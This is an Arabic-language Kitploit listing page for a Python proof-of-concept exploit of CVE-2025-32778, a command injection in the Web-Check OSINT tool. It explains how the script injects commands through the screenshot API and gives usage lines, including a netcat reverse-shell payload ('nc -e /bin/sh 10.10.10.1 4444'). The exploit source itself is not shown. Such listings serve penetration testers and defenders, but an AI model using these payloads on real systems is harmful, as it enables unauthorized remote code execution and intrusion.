Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32778 — استغلال PoC لـ CVE-2025-32778: حقن أوامر في أداة Web-Check OSINT | Kitploit
أدوات/GitHubGitHub/00xcanelo/cve-2025-32778
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHub00xcanelo/cve-2025-32778

CVE-2025-32778

استغلال PoC لـ CVE-2025-32778: حقن أوامر في أداة Web-Check OSINT

عرض المستودع
3149منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-32778 - استغلال حقن الأوامر في Web-Check

Critical Language: Python

الوصف

CVE-2025-32778 هي ثغرة حرجة لحقن الأوامر في أداة Web-Check الخاصة بـ OSINT من Lissy93.
تتيح للمهاجمين غير الموثّقين تنفيذ أوامر نظام تعسفية عبر معامل url في واجهة برمجة تطبيقات لقطة الشاشة.

يقوم هذا النص البرمجي بلغة Python بأتمتة الاستغلال ويمكنه إنشاء شيلات عكسية أو قبول حمولات شيل مخصصة.


تحذير

  • اختبر فقط على الأنظمة التي تملكها أو مفوض لاختبارها.
  • الاستخدام غير المصرح به غير قانوني وغير أخلاقي.

الميزات

  • استغلال حقن الأوامر في url في Web-Check.
  • يدعم:
    • شيل عكسي باستخدام --lhost و .
--lport
  • شيل مخصص عبر --shell.
  • تطبيع عنوان URL.
  • يمنع الجمع بين --shell و --lhost/--lport.

  • المتطلبات

    • بايثون 3.x
    • مكتبة الطلبات:
    root@kitploit:~
    pip install requests
    

    الاستخدام

    root@kitploit:~
    git clone https://github.com/00xCanelo/CVE-2025-32778
    cd CVE-2025-32778
    

    جعل الأداة تنشئ شيلاً عكسيًا

    root@kitploit:~
    python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444
    

    حمولة شيل مخصصة (خام)

    root@kitploit:~
    python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"
    

    قائمة المساعدة

    root@kitploit:~
    python3 cve-2025-32778.py -h
    

    كيف يعمل

    1. تطبيع عنوان الهدف إلى scheme://host[:port].

    2. تحضير الحمولة:

      • إنشاء شيل عكسي باستخدام --lhost و --lport.
      • أو استخدام أمر شيل خام مع --shell.
    3. ترميز حمولة الشيل لحقن آمن في عنوان URL.

    4. إرسال طلب HTTP GET إلى /api/screenshot/ مع الحمولة.

    5. انتظار اتصال الشيل العكسي.


    🧑‍💻 المؤلف

    00xCanelo
    ملف تعريف GitHub


    المراجع

    • مستودع Web-Check على GitHub – المشروع الأصلي الذي يحتوي على الكود الثغرة.
    • CVE-2025-32778 – إدخال CVE الذي يصف ثغرة حقن الأوامر.
    تنزيل الأداة